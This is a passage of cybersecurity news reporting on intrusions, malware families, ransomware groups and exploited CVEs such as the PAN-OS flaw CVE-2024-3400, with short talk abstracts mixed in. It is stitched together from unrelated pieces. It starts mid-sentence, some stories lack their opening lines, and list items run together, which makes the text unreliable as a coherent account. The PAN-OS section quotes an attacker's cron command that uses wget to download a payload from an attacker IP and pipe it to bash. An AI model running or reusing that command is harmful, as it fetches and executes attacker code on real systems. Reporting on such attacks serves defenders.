the person being tracked, these apps operate stealthily and provide a
perpetrator with the means to gain control over a victim's life," the company
said.
The intrusion led to the compromise of its Networked Experimentation, Research,
and Virtualization Environment (NERVE), an unclassified research and prototyping
network.
The unknown adversary "performed reconnaissance of our networks, exploited one
of our Virtual Private Networks (VPNs) through two Ivanti Connect Secure
zero-day vulnerabilities, and skirted past our multi-factor authentication using
session hijacking," Lex Crumpton, a defensive cyber operations researcher at the
non-profit, said last week.
The attack entailed the exploitation of CVE-2023-46805 (CVSS score: 8.2) and
CVE-2024-21887 (CVSS score: 9.1), which could be weaponized by threat actors to
bypass authentication and run arbitrary commands on the infected system.
Upon gaining initial access, the threat actors moved laterally and breached its
VMware infrastructure using a compromised administrator account, ultimately
paving the way for the deployment of backdoors and web shells for persistence
and credential harvesting.
"NERVE is an unclassified collaborative network that provides storage,
computing, and networking resources," MITRE said. "Based on our investigation to
date, there is no indication that MITRE's core enterprise network or partners'
systems were affected by this incident."
The organization said that it has since taken steps to contain the incident, and
that it undertook response and recovery efforts as well as forensic analysis to
identify the extent of the compromise.
The initial exploitation of the twin flaws has been attributed to a cluster
tracked by cybersecurity company Volexity under the name UTA0178, a nation-state
actor likely linked to China. Since then, several other China-nexus hacking
groups have joined the exploitation bandwagon, according to Mandiant.
"No organization is immune from this type of cyber attack, not even one that
strives to maintain the highest cybersecurity possible," Jason Providakes,
president and CEO of MITRE, said.
"We are disclosing this incident in a timely manner because of our commitment to
operate in the public interest and to advocate for best practices that enhance
enterprise security as well as necessary measures to improve the industry's
current cyber defense posture."
The threat actor known as ToddyCat has been observed using a wide range of tools
to retain access to compromised environments and steal valuable data.
Russian cybersecurity firm Kaspersky characterized the adversary as relying on
various programs to harvest data on an "industrial scale" from primarily
governmental organizations, some of them defense related, located in the
Asia-Pacific region.
"To collect large volumes of data from many hosts, attackers need to automate
the data harvesting process as much as possible, and provide several alternative
means to continuously access and monitor systems they attack," security
researchers Andrey Gunkin, Alexander Fedotov, and Natalya Shornikova said.
ToddyCat was first documented by the company in June 2022 in connection with a
series of cyber attacks aimed at government and military entities in Europe and
Asia since at least December 2020. These intrusions leveraged a passive backdoor
dubbed Samurai that allows for remote access to the compromised host.
A closer examination of the threat actor's tradecraft has since uncovered
additional data exfiltration tools like LoFiSe and Pcexter to gather data and
upload archive files to Microsoft OneDrive.
The latest set of programs entail a mix of tunneling data gathering software,
which are put to use after the attacker has already obtained access to
privileged user accounts in the infected system. This includes -
Reverse SSH tunnel using OpenSSH SoftEther VPN, which is renamed to seemingly
innocuous files like "boot.exe," "mstime.exe," "netscan.exe," and
"kaspersky.exe" Ngrok and Krong to encrypt and redirect command-and-control
(C2) traffic to a certain port on the target system FRP client, an
open-source Golang-based fast reverse proxy Cuthead, a .NET compiled
executable to search for documents matching a specific extension or a filename,
or the date when they are modified WAExp, a .NET program to capture data
associated with the WhatsApp web app and save it as an archive, and TomBerBil
to extract cookies and credentials from web browsers like Google Chrome and
Microsoft Edge Maintaining multiple simultaneous connections from the
infected endpoints to actor-controlled infrastructure using different tools is
seen as a fallback mechanism and a way to retain access in cases where one of
the tunnels is discovered and taken down.
"The attackers are actively using techniques to bypass defenses in an attempt to
mask their presence in the system," Kaspersky said.
"To protect the organization's infrastructure, we recommend adding to the
firewall denylist the resources and IP addresses of cloud services that provide
traffic tunneling. In addition, users must be required to avoid storing
passwords in their browsers, as it helps attackers to access sensitive
information."
The post-compromise tool, which is said to have been used since at least June
2020 and possibly as early as April 2019, leveraged a now-patched flaw that
allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8).
It was addressed by Microsoft as part of updates released in October 2022, with
the U.S. National Security Agency (NSA) credited for reporting the flaw at the
time.
According to new findings from the tech giant's threat intelligence team, APT28
– also called Fancy Bear and Forest Blizzard (formerly Strontium) – weaponized
the bug in attacks targeting Ukrainian, Western European, and North American
government, non-governmental, education, and transportation sector
organizations.
"Forest Blizzard has used the tool [...] to exploit the CVE-2022-38028
vulnerability in Windows Print Spooler service by modifying a JavaScript
constraints file and executing it with SYSTEM-level permissions," the company
said.
"While a simple launcher application, GooseEgg is capable of spawning other
applications specified at the command line with elevated permissions, allowing
threat actors to support any follow-on objectives such as remote code execution,
installing a backdoor, and moving laterally through compromised networks."
Forest Blizzard is assessed to be affiliated with Unit 26165 of the Russian
Federation's military intelligence agency, the Main Intelligence Directorate of
the General Staff of the Armed Forces of the Russian Federation (GRU).
Active for nearly 15 years, the Kremlin-backed hacking group's activities are
predominantly geared towards intelligence collection in support of Russian
government foreign policy initiatives.
In recent months, APT28 hackers have also abused a privilege escalation flaw in
Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) and a code execution bug in
WinRAR (CVE-2023-38831, CVSS score: 7.8), indicating their ability to swiftly
adopt public exploits into their tradecraft.
"Forest Blizzard's objective in deploying GooseEgg is to gain elevated access to
target systems and steal credentials and information," Microsoft said. "GooseEgg
is typically deployed with a batch script."
The GooseEgg binary supports commands to trigger the exploit and launch either a
provided dynamic-link library (DLL) or an executable with elevated permissions.
It also verifies if the exploit has been successfully activated using the whoami
command.
The disclosure comes as IBM X-Force revealed new phishing attacks orchestrated
by the Gamaredon actor (aka Aqua Blizzard, Hive0051, and UAC-0010) that deliver
new iterations of the GammaLoad malware -
GammaLoad.VBS, which is a VBS-based backdoor initiating the infection chain
GammaStager, which is used to download and execute a series of Base64-encoded
VBS payloads GammaLoadPlus, which is used to run .EXE payloads
GammaInstall, which serves as the loader for a known PowerShell backdoor
referred to as GammaSteel GammaLoad.PS, a PowerShell implementation of
GammaLoad GammaLoadLight.PS, a PowerShell variant that contains code to
spread the spread itself to connected USB devices GammaInfo, a
PowerShell-based enumeration script collecting various information from the host
GammaSteel, a PowerShell-based malware to exfiltrate files from a victim based
on an extension allowlist "Hive0051 rotates infrastructure through
synchronized DNS fluxing across multiple channels including Telegram, Telegraph
and Filetransfer.io," IBM X-Force researchers said earlier this month, stating
it "points to a potential elevation in actor resources and capability devoted to
ongoing operations."
"It is highly likely Hive0051's consistent fielding of new tools, capabilities
and methods for delivery facilitate an accelerated operations tempo."
"They are learning to use tools powered by AI large language models (LLM) to
make their operations more efficient and effective," the tech giant said in its
latest report on East Asia hacking groups.
The company specifically highlighted a group named Emerald Sleet (aka Kimusky or
TA427), which has been observed using LLMs to bolster spear-phishing efforts
aimed at Korean Peninsula experts.
The adversary is also said to have relied on the latest advancements in AI to
research vulnerabilities and conduct reconnaissance on organizations and experts
focused on North Korea, joining hacking crews from China, who have turned to
AI-generated content for influence operations.
It further employed LLMs to troubleshoot technical issues, conduct basic
scripting tasks, and draft content for spear-phishing messages, Redmond said,
adding it worked with OpenAI to disable accounts and assets associated with the
threat actor.
According to a report published by enterprise security firm Proofpoint last
week, the group "engages in benign conversation starter campaigns to establish
contact with targets for long-term exchanges of information on topics of
strategic importance to the North Korean regime."
Kimsuky's modus operandi involves leveraging think tank and non-governmental
organization-related personas to legitimize its emails and increase the
likelihood of success of the attack.
In recent months, however, the nation-state actor has begun to abuse lax
Domain-based Message Authentication, Reporting, and Conformance (DMARC) policies
to spoof various personas and incorporate web beacons (i.e., tracking pixels)
for target profiling, indicating its "agility in adjusting its tactics."
"The web beacons are likely intended as initial reconnaissance to validate
targeted emails are active and to gain fundamental information about the
recipients' network environments, including externally visible IP addresses,
User-Agent of the host, and time the user opened the email," Proofpoint said.
The development comes as North Korean hacking groups are continuing to engage in
cryptocurrency heists and supply chain attacks, with a threat actor dubbed Jade
Sleet linked to the theft of at least $35 million from an Estonian crypto firm
in June 2023 and over $125 million from a Singapore-based cryptocurrency
platform a month later.
Jade Sleet, which overlaps with clusters tracked as TraderTraitor and UNC4899,
has also been observed attacking online cryptocurrency casinos in August 2023,
not to mention leveraging bogus GitHub repos and weaponized npm packages to
single out employees of cryptocurrency and technology organizations.
In another instance, a Germany-based IT company was compromised by Diamond Sleet
(aka Lazarus Group) in August 2023 and weaponized an application from a
Taiwan-based IT firm to conduct a supply chain attack in November 2023.
"This is likely to generate revenue, principally for its weapons program, in
addition to collecting intelligence on the United States, South Korea, and
Japan," Clint Watts, general manager of the Microsoft Threat Analysis Center
(MTAC), said.
The Lazarus Group is also notable for employing intricate methods like Windows
Phantom DLL Hijacking and Transparency, Consent, and Control (TCC) database
manipulation in Windows and macOS, respectively, to undermine security
protections and deploy malware, contributing to its sophistication and elusive
nature, per Interpres Security.
The findings come against the backdrop of a new campaign orchestrated by the
Konni (aka Vedalia) group that uses Windows shortcut (LNK) files to deliver
malicious payloads.
"The threat actor utilized double extensions to conceal the original .lnk
extension, with the LNK files observed containing excessive whitespace to
obscure the malicious command lines," Symantec said. "As part of the attack
vector, the command line script searched for PowerShell to bypass detection and
locate embedded files and the malicious payload."
A new information stealer has been found leveraging Lua bytecode for added
stealth and sophistication, findings from McAfee Labs reveal.
The cybersecurity firm has assessed it to be a variant of a known malware called
RedLine Stealer owing to the fact that the command-and-control (C2) server IP
address has been previously identified as associated with the malware.
RedLine Stealer, first documented in March 2020, is typically delivered via
email and malvertising campaigns, either directly or via exploit kits and loader
malware like dotRunpeX and HijackLoader.
The off-the-shelf malware is capable of harvesting information from
cryptocurrency wallets, VPN software, and web browsers, such as saved
credentials, autocomplete data, credit card information, and geolocations based
on the victims' IP addresses.
Over the years, RedLine Stealer has been co-opted by several threat actors into
their attack chains, making it a prevalent strain spanning North America, South
America, Europe, Asia, and Australia.
The infection sequence identified by McAfee abuses GitHub, using two of
Microsoft's official repositories for its implementation of the C++ Standard
Library (STL) and vcpkg to host the malware-laden payload in the form of ZIP
archives.
It's currently not known how the files came to be uploaded to the repository,
but the technique is a sign that threat actors are weaponizing the trust
associated with trustworthy repositories to distribute malware. The ZIP files
are no longer available for download from the Microsoft repositories.
The ZIP archive ("Cheat.Lab.2.7.2.zip" and "Cheater.Pro.1.6.0.zip") masquerades
as a game cheat, indicating that gamers are likely the target of the campaign.
It comes fitted with an MSI installer that's designed to run the malicious Lua
bytecode.
"This approach provides the advantage of obfuscating malicious stings and
avoiding the use of easily recognizable scripts like wscript, JScript, or
PowerShell script, thereby enhancing stealth and evasion capabilities for the
threat actor," researchers Mohansundaram M. and Neil Tyagi said.
In an attempt to pass the malware to other systems, the MSI installer displays a
message urging the victim to share the program with their friends in order to
get the unlocked version of the software.
The "compiler.exe" executable within the installer, upon running the Lua
bytecode embedded within the "readme.txt" file present in the ZIP archive, sets
up persistence on the host using a scheduled task and drops a CMD file, which,
in turn, runs "compiler.exe" under another name "NzUw.exe."
In the final stage, "NzUw.exe" initiates communications with a
command-and-control (C2) server over HTTP, the aforementioned IP address
attributed to RedLine.
The malware functions more like a backdoor, carrying out tasks fetched from the
C2 server (e.g., taking screenshots) and exfiltrating the results back to it.
The exact method by which the links to the ZIP archives are distributed is
presently unknown. Earlier this month, Checkmarx revealed how threat actors are
taking advantage of GitHub's search functionality to trick unsuspecting users
into downloading malware-laden repositories.
The development comes as Recorded Future detailed a "large-scale
Russian-language cybercrime operation" that singles out the gaming community and
leverages fake Web3 gaming lures to deliver malware capable of stealing
sensitive information from macOS and Windows users, a technique called trap
phishing.
"The campaign involves creating imitation Web3 gaming projects with slight name
and branding modifications to appear legitimate, along with fake social media
accounts to bolster their authenticity," Insikt Group said.
"The main webpages of these projects offer downloads that, once installed,
infect devices with various types of "infostealer" malware such as Atomic macOS
Stealer (AMOS), Stealc, Rhadamanthys, or RisePro, depending on the operating
system."
It also follows a wave of malware campaigns targeting enterprise environments
with loaders such as PikaBot and a new strain called NewBot Loader.
"Attackers demonstrated a diverse range of techniques and infection vectors in
each campaign, aiming to deliver the PikaBot payload," McAfee said.
This includes a phishing attack that takes advantage of email conversation
hijacking and a Microsoft Outlook flaw called MonikerLink (CVE-2024-21413) to
entice victims into downloading the malware from an SMB share.
Event logs are a fundamental resource for security professionals seeking to
understand the activity occurring in an environment. Cloud logs serve a
similar purpose as their on-premise counterparts, though differing
significantly in format and granularity between cloud providers.
As control-flow protection techniques are widely deployed, it is
difficult for attackers to modify control data, like function pointers,
to hijack program control flow. Instead, data-only attacks corrupt
security-related non-control data (critical data), and can bypass all
control-flow protections to revive severe attacks.
Arm Cortex-M Microcontrollers (MCUs) are the de facto computing units
powering billions of small embedded and Internet of Things (IoT)
devices. Recently, as a step towards securing devices at scale, Arm
introduced the TrustZone technology in the latest generation of their
Armv8-M MCUs (e.g., Cortex-M33).
In September 2023 Apple released iOS 16.6.1 closing actively exploited
vulnerabilities. On the same day, CitizenLab released a new blog post
about NSO's latest Exploit called BLASTPASS.
In the rapidly evolving landscape of Large Language Models (LLMs), their
integration into applications is becoming increasingly common. However,
this integration, often facilitated by frameworks such as LangChain and
LlamaIndex, poses significant security risks.
Process isolation is a crucial security feature in the Chrome browser.
In the early stages, process isolation was only implemented as
out-of-process render (Sandboxed Renderer). With the emergence of new
attack methods such as UXSS and Spectre, which can steal or speculate on
data from the render process, Chrome introduced the concept of Site
Isolation, advocating for a more refined process isolation.
Among these developments, the Autonomous Driving Domain Controller is a
crucial part. Many smart cars use AI chips like Nvidia Orin and Mobileye
EQ5. They employ high-precision GPS, multiple cameras, LiDAR, and other
sensors to sense and locate their surroundings, making decisions using
algorithms. They control the car's movements, like braking and steering,
by sending and receiving CAN messages.
Backwards compatibility is a key element in Windows. To support that,
some known issues stay unfixed for years. We encountered such an issue
when we ended a file name with a dot using the NT API. Surprisingly, we
couldn't delete, write or rename it. Then, we created a similarly named
file without the dot, and like magic, file operations on the first file,
affected the new file.
At the end of June 2023, we decided to conduct vulnerability research on
the Windows RDP client. Initially, we read some publicly available blogs
and modified two open-source Windows RDP fuzzing projects. During this
process, we successfully identified an old Windows RDP client
vulnerability but did not discover any new vulnerabilities.
Over the past few years, DCOM received a lot of attention in Windows
security research. The "Potato" exploits (RottenPotato, JuicyPotato,
RoguePotato, RemotePotato , and LocalPotato) and Kerberos Relay attack
are both impressive research in this area.
So far, the card information theft groups we are familiar with have
typically engaged in illegal replication of stolen cards or selling them
on carding shops and the dark web for financial gain. However, the
threat group we've been tracking over the past few months has shown some
differences.
Crypto systems are the cornerstone of our digital security
infrastructure, whether they are used to encrypt our data to protect
their confidentiality or for signing to prove data authenticity.
However, most crypto systems have an Achilles heel: Their security
relies on the proper randomness of their parameters' values, such as
keys or nonces.
All across the world, everyone is pedal-to-the-metal on machine
intelligence, almost as though we're still assembling the plane
mid-flight. With that being said, there's a lot about machine learning
models that might surprise you and definitely surprises many ML and
security engineers.
Privacy data protection has become a major concern within regions, such
as Europe, where GDPR is implemented. To discover the potentially
privacy-infringing behaviors, manufacturers must test applications for
compliance before release.
China's military cyber operations have showcased a noticeable strategic
shift in the recent years. The Strategic Support Force (SSF) – the joint
information warfare (IW) command of the People's Liberation Army (PLA) –
is gradually finding its ground.
Your metrics are boring and dangerous. Recycled slides with meaningless
counts of alerts, incidents, true and false positives… SNOOZE. Even
worse, it's motivating your team to distort the truth and subvert
progress. This talk is your wake-up call to rethink your detection and
response metrics.
Hugging Face (HF) has emerged as a popular open platform for maintaining
and sharing pre-trained machine learning (ML) models. It fully
understands the pickle model deserialization threats originally
introduced by Pytorch and accordingly implements pickle scanning for
mitigation. In October 2022, Pytorch patched such a threat by
white-listing weights-only modules.
In this talk we return for a third time to talk about bypassing macOS's
privacy mechanisms. In the last 4 years we submitted over 100
vulnerabilities to Apple which allowed us to either fully or partially
bypass macOS's privacy protection framework (TCC). We gave talks about
our findings and various techniques in previous BlackHat conferences.
VMware Workstation is used by software developers and network security
practitioners. Users can run dangerous programs in it without affecting
the host system. However, if these programs can escape, the host system
is no longer safe. If APT attack organizations exploit these
vulnerabilities to attack these practitioners, it would be a disaster.
Entra ID Conditional Access is a security feature that apply the right
access controls for securing Microsoft cloud infrastructure. Conditional
Access takes signals from various sources into account when making
access decisions. One of the major signals is Deivce; Conditional Access
can require device marked as compliant or Microsoft Entra hybrid joined
device for authentication.
Endpoint security controls are the most essential tool for protecting
computer systems from various malware threats. Most of them usually
include several layers of detection modules. Among them is the byte
signature detection logic, which is usually treated as the most reliable
layer with the lowest false positive rate.
Android system and anti-virus industry have been struggling with UI
security issues, among which Activity Hijack Attack (AHA) is one of the
most powerful UI Hijack techniques. In the era of API14~26, BankBot and
Spyware could launch zero-cost hijacking attacks on user devices for
access sensitive credentials or runtime permissions.
China-nexus actors have compromised edge devices such as firewall, VPN,
IoT devices, etc. against Taiwan Government since 2020 during COVID19,
and have compromised those devices to build Botnet, spread
disinformation, and exfiltrate sensitive data. However, edge devices
belong to closed embedded platforms, and installing antivirus/EDR on
those platforms and extracting malware are difficult.
In August 2022, a single voice-phishing incident in South Korea
caused $4.1 billion in damages, the largest single cyber incident in
the country. Voice phishing attack groups trick victims into
installing a malicious app and then convince them to call law
enforcement.
Uncompyle6, and decompyle3 are the most complete, popular, and accurate
open-source Python bytecode decompilers available for the Python
versions they support. The underlying cross-platform disassembler they
use, xdis, is also unique.
Palo Alto Networks has shared more details of a critical security flaw impacting
PAN-OS that has come under active exploitation in the wild by malicious actors.
The company described the vulnerability, tracked as CVE-2024-3400 (CVSS score:
10.0), as "intricate" and a combination of two bugs in versions PAN-OS 10.2,
PAN-OS 11.0, and PAN-OS 11.1 of the software.
"In the first one, the GlobalProtect service did not sufficiently validate the
session ID format before storing them. This enabled the attacker to store an
empty file with the attacker's chosen filename," Chandan B. N., senior director
of product security at Palo Alto Networks, said.
"The second bug (trusting that the files were system-generated) used the
filenames as part of a command."
It's worth noting that while neither of the issues are critical enough on their
own, when chained together, they could lead to unauthenticated remote shell
command execution.
Palo Alto Networks said that the threat actor behind the zero-day exploitation
of the flaw, UTA0218, carried out a two-stage attack to achieve command
execution on susceptible devices. The activity is being tracked under the name
Operation MidnightEclipse.
As previously disclosed by both Volexity and the network security company's own
Unit 42 threat intelligence division, this involves sending specially crafted
requests containing the command to be executed, which is then run via a backdoor
called UPSTYLE.
"The initial persistence mechanism setup by UTA0218 involved configuring a cron
job that would use wget to retrieve a payload from an attacker-controlled URL
with its output being written to stdout and piped to bash for execution,"
Volexity noted last week.
"The attacker used this method to deploy and execute specific commands and
download reverse proxy tooling such as GOST (GO Simple Tunnel)."
Unit 42 said it has been unable to determine the commands executed via this
mechanism – wget -qO- hxxp://172.233.228[.]93/policy | bash – but assessed that
the cron job-based implant is likely used to carry out post-exploitation
activities.
"In stage 1, the attacker sends a carefully crafted shell command instead of a
valid session ID to GlobalProtect," Chandan explained. "This results in creating
an empty file on the system with an embedded command as its filename, as chosen
by the attacker."
"In stage 2, an unsuspecting scheduled system job that runs regularly uses the
attacker-provided filename in a command. This results in the execution of the
attacker-supplied command with elevated privileges."
While Palo Alto Networks initially noted that successful exploitation of
CVE-2024-3400 required the firewall configurations for GlobalProtect gateway or
GlobalProtect portal (or both) and device telemetry enabled, the company has
since confirmed that device telemetry has no bearing on the problem.
This is based on new findings from Bishop Fox, which discovered bypasses to
weaponize the flaw such that it did not require telemetry to be enabled on a
device in order to infiltrate it.
The company has also expanded patches for the flaw over the last few days to
cover other commonly deployed maintenance releases -
PAN-OS 10.2.9-h1 PAN-OS 10.2.8-h3 PAN-OS 10.2.7-h8 PAN-OS 10.2.6-h3
PAN-OS 10.2.5-h6 PAN-OS 10.2.4-h16 PAN-OS 10.2.3-h13 PAN-OS 10.2.2-h5
PAN-OS 10.2.1-h2 PAN-OS 10.2.0-h3 PAN-OS 11.0.4-h1 PAN-OS 11.0.4-h2
PAN-OS 11.0.3-h10 PAN-OS 11.0.2-h4 PAN-OS 11.0.1-h4 PAN-OS 11.0.0-h3
PAN-OS 11.1.2-h3 PAN-OS 11.1.1-h1 PAN-OS 11.1.0-h3 In light of the
active abuse of CVE-2024-3400 and the availability of a proof-of-concept (PoC)
exploit code, users are recommended to take steps to apply the hotfixes as soon
as possible to safeguard against potential threats.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added
the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, ordering
federal agencies to secure their devices by April 19, 2024.
According to information shared by the Shadowserver Foundation, approximately
22,542 internet-exposed firewall devices are likely vulnerable to the
CVE-2024-3400. A majority of the devices are in the U.S., Japan, India, Germany,
the U.K., Canada, Australia, France, and China as of April 18, 2024.
"CrushFTP v11 versions below 11.1 have a vulnerability where users can escape
their VFS and download system files," CrushFTP said in an advisory released
Friday. "This has been patched in v11.1.0."
That said, customers who are operating their CrushFTP instances within a DMZ
(demilitarized zone) restricted environment are protected against the attacks.
Simon Garrelou of Airbus CERT has been credited with discovering and reporting
the flaw. It has yet to be assigned a CVE identifier.
Cybersecurity company CrowdStrike, in a post shared on Reddit, said it has
observed an exploit for the flaw being used in the wild in a "targeted fashion."
These intrusions are said to have mainly targeted U.S. entities, with the
intelligence gathering activity suspected to be politically motivated.
"CrushFTP users should continue to follow the vendor's website for the most
up-to-date instructions and prioritize patching," CrowdStrike said.
Technology, research, and government sectors in the Asia-Pacific region have
been targeted by a threat actor called BlackTech as part of a recent cyber
attack wave.
The intrusions pave the way for an updated version of modular backdoor dubbed
Waterbear as well as its enhanced successor referred to as Deuterbear.
"Waterbear is known for its complexity, as it uses a number of evasion
mechanisms to minimize the chance of detection and analysis," Trend Micro
researchers Cyris Tseng and Pierre Lee said in an analysis last week.
"In 2022, Earth Hundun began using the latest version of Waterbear — also known
as Deuterbear — which has several changes, including anti-memory scanning and
decryption routines, that make us consider it a different malware entity from
the original Waterbear."
The cybersecurity firm is tracking the threat actor under the moniker Earth
Hundun, which is known to be active since at least 2007. It also goes by other
names such as Circuit Panda, HUAPI, Manga Taurus, Palmerworm, Red Djinn, and
Temp.Overboard.
In a joint advisory published last September, cybersecurity and intelligence
agencies from Japan and the U.S. attributed the adversary to China, describing
its ability to modify router firmware and exploit routers' domain-trust
relationships to pivot from international subsidiaries to their corporate
headquarters based in the two countries.
"BlackTech actors use custom malware, dual-use tools, and living-off-the-land
tactics, such as disabling logging on routers, to conceal their operations," the
governments said.
"Upon gaining an initial foothold into a target network and gaining
administrator access to network edge devices, BlackTech cyber actors often
modify the firmware to hide their activity across the edge devices to further
maintain persistence in the network."
One of the crucial tools in its multifaceted arsenal is Waterbear (aka
DBGPRINT), which has been put to use since 2009 and has been consistently
updated over the years with improved defense evasion features.
The core remote access trojan is fetched from a command-and-control (C2) server
by means of a downloader, which is launched using a loader that, in turn, is
executed via a known technique called DLL side-loading.
The newest version of the implant supports nearly 50 commands, enabling it to
perform a wide range of activities, including process enumeration and
termination, file operations, window management, start and exit remote shell,
screenshot capture, and Windows Registry modification, among others.
Also delivered using a similar infection flow since 2022 is Deuterbear, whose
downloader implements an array of obfuscation methods to resist anti-analysis
and uses HTTPS for C2 communications.
"Since 2009, Earth Hundun has continuously evolved and refined the Waterbear
backdoor, as well as its many variants and branches," the researchers said.
"The Deuterbear downloader employs HTTPS encryption for network traffic
protection and implements various updates in malware execution, such as altering
the function decryption, checking for debuggers or sandboxes, and modifying
traffic protocols."
"Since March 2023, Akira ransomware has impacted a wide range of businesses and
critical infrastructure entities in North America, Europe, and Australia,"
cybersecurity agencies from the Netherlands and the U.S., along with Europol's
European Cybercrime Centre (EC3), said in a joint alert.
"In April 2023, following an initial focus on Windows systems, Akira threat
actors deployed a Linux variant targeting VMware ESXi virtual machines."
The double-extortion group has been observed using a C++ variant of the locker
in the early stages, before shifting to a Rust-based code as of August 2023.
It's worth noting that the e-crime actor is completely different from the Akira
ransomware family that was active in 2017.
Initial access to target networks is facilitated by means of exploiting known
flaws in Cisco appliances (e.g., CVE-2020-3259 and CVE-2023-20269).
Alternate vectors involve the use of Remote Desktop Protocol (RDP),
spear-phishing, valid credentials, and virtual private network (VPN) services
lacking in multi-factor authentication (MFA) protections.
Akira actors are also known to leverage various ways to set up persistence by
creating a new domain account on the compromised system, as well as evade
detection by abusing the Zemana AntiMalware driver to terminate
antivirus-related processes via what's called a Bring Your Own Vulnerable Driver
(BYOVD) attack.
To aid in privilege escalation, the adversary relies on credential scraping
tools like Mimikatz and LaZagne, while Windows RDP is utilized to move laterally
within the victim's network. Data exfiltration is accomplished through
FileZilla, WinRAR, WinSCP, and RClone.
"Akira ransomware encrypts targeted systems using a hybrid encryption algorithm
that combines Chacha20 and RSA," Trend Micro said in an analysis of the
ransomware published in October 2023.
"Additionally, the Akira ransomware binary, like most modern ransomware
binaries, has a feature that allows it to inhibit system recovery by deleting
shadow copies from the affected system."
Blockchain and source code data suggests that Akira ransomware group is likely
affiliated with the now-defunct Conti ransomware gang. A decryptor for Akira was
released by Avast last July, but it's highly likely the shortcomings have since
been plugged.
Akira's mutation to target Linux enterprise environments also follows similar
moves by other established ransomware families such as LockBit, Cl0p, Royal,
Monti, and RTM Locker.
LockBit's Struggles to Come Back# The disclosure comes as Trend Micro
revealed that the sweeping law enforcement takedown of the prolific LockBit gang
earlier this February has had a significant operational and reputational impact
on the group's ability to bounce back, prompting it to post old and fake victims
on its new data leak site.
"LockBit was one of the most prolific and widely used RaaS strains in operation,
with potentially hundreds of affiliates, including many associated with other
prominent strains," Chainalysis noted in February.
The blockchain analytics firm said it uncovered cryptocurrency trails connecting
a LockBit administrator to a journalist based in Sevastopol known as Colonel
Cassad, who has a history of soliciting donations for Russian militia group
operations in the sanctioned jurisdictions of Donetsk and Luhansk following the
onset of the Russo-Ukrainian war in 2022.
It's worth pointing out that Cisco Talos, in January 2022, linked Colonel Cassad
(aka Boris Rozhin) to an anti-Ukraine disinformation campaign orchestrated by
the Russian state-sponsored group known as APT28.
"Following the operation, LockBitSupp [the alleged leader of LockBit] appears to
be attempting to inflate the apparent victim count while also focusing on
posting victims from countries whose law enforcement agencies participated in
the disruption," Trend Micro said in a recent deep dive.
"This is possibly an attempt to reinforce the narrative that it would come back
stronger and target those responsible for its disruption."
In an interview with Recorded Future News last month, LockBitSupp acknowledged
the short-term decline in profits, but promised to improve their security
measures and "work as long as my heart beats."
"Reputation and trust are key to attracting affiliates, and when these are lost,
it's harder to get people to return. Operation Cronos succeeded in striking
against one element of its business that was most important: its brand," Trend
Micro stated.
Agenda Returns with an Updated Rust Version# The development also follows the
Agenda ransomware group's (aka Qilin and Water Galura) use of an updated Rust
variant to infect VMWare vCenter and ESXi servers through Remote Monitoring and
Management (RMM) tools and Cobalt Strike.
"The Agenda ransomware's ability to spread to virtual machine infrastructure
shows that its operators are also expanding to new targets and systems," the
cybersecurity company said.
Even as a fresh crop of ransomware actors continues to energize the threat
landscape, it's also becoming clearer that "crude, cheap ransomware" sold on the
cybercrime underground is being put to use in real-world attacks, allowing
lower-tier individual threat actors to generate significant profit without
having to be a part of a well-organized group.
Interestingly, a majority of these varieties are available for a single, one-off
price starting from as low as $20 for a single build, while a few others such as
HardShield and RansomTuga are offered at no extra cost.
"Away from the complex infrastructure of modern ransomware, junk-gun ransomware
allows criminals to get in on the action cheaply, easily, and independently,"
Sophos said, describing it as a "relatively new phenomenon" that further lowers
the cost of entry.
"They can target small companies and individuals, who are unlikely to have the
resources to defend themselves or respond effectively to incidents, without
giving anyone else a cut."
Cisco Talos said its findings are based on an analysis of over 100 confidential
documents that were infected with the VBA macro virus and uploaded to the
VirusTotal malware scanning platform since 2018. More than 20 such documents
have been uploaded since 2022.
"The documents contained VBA code to drop and run an executable with the name
'ctrlpanel.exe,'" security researcher Vanja Svajcer said. "The virus is still
active in Ukraine and is causing potentially confidential documents to be
uploaded to publicly accessible document repositories."
A striking aspect of OfflRouter is its inability to spread via email,
necessitating that it be propagated via other means, such as sharing documents
and removable media, including USB memory sticks containing the infected
documents.
"It would require manual user intervention to send an infected document as an
email attachment," a Talos researcher told The Hacker News. "That could be the
reason why the virus stayed under the radar for such a long time as it is not
very noisy."
"We can only speculate as to why there is no automated spreading by email. That
said, if the malware was attached to a document sent via email, the virus would
still attempt to infect files located on removable media."
These design choices, intentional or otherwise, are said to have confined the
spread of OfflRouter within Ukraine's borders and to a few organizations, thus
escaping detection for almost 10 years.
It's currently not known who is responsible for the malware and there are no
indications that it was developed by someone from Ukraine.
Whoever it is, they have been described as inventive yet inexperienced owing to
the unusual propagation mechanism and the presence of several mistakes in the
source code.
OfflRouter has been previously highlighted by MalwareHunterTeam as early as May
2018 and again by the Computer Security Incident Response Team Slovakia
(CSIRT.SK) in August 2021, detailing infected documents uploaded to the National
Police of Ukraine's website.
The modus operandi has remained virtually unchanged, with the VBA macro-embedded
Microsoft Word documents dropping a .NET executable named "ctrlpanel.exe," which
then infects all files with the .DOC (not .DOCX) extension found on the system
and other removable media with the same macro.
"The infection iterates through a list of the document candidates to infect and
uses an innovative method to check the document infection marker to avoid
multiple infection processes – the function checks the document creation
metadata, adds the creation times, and checks the value of the sum," Svajcer
said.
"If the sum is zero, the document is considered already infected."
That said, the attack becomes successful only when VBA macros are enabled.
Microsoft, as of July 2022, has been blocking macros by default in Office
documents downloaded from the internet, prompting threat actors to seek other
initial access pathways.
While Microsoft's preventive measure limits the success of such macro-based
attacks, Cisco Talos told the publication that many organizations in the
affected region, including government entities, are not using up-to-date Office
versions.
"The main issue we tried to raise is not that a virus is active and affects
Microsoft Office, but that users can unknowingly upload confidential documents
to public repositories," it said. "Users need to double check for the malware
infection."
Another key function of the malware is to make Windows Registry modifications so
as to ensure that the executable runs every time upon booting the system.
"The virus targets only documents with the filename extension .DOC, the default
extension for the OLE2 documents, and it will not try to infect other filename
extensions," Svajcer said. "The default Word document filename extension for the
more recent Word versions is .DOCX, so few documents will be infected as a
result."
That's not all. Ctrlpanel.exe is also equipped to search for potential plugins
(with the extension .ORP) present on removable drives and execute them on the
machine, which implies the malware is expecting the plugins to be delivered via
USB drives or CD-ROMs.
One the contrary, if the plugins are already present on a host, OfflRouter takes
care of encoding them, copying the files to the root folder of the attached
removable media with the filename extension .ORP, and manipulating them to make
them hidden so that they are not visible through the File Explorer when plugging
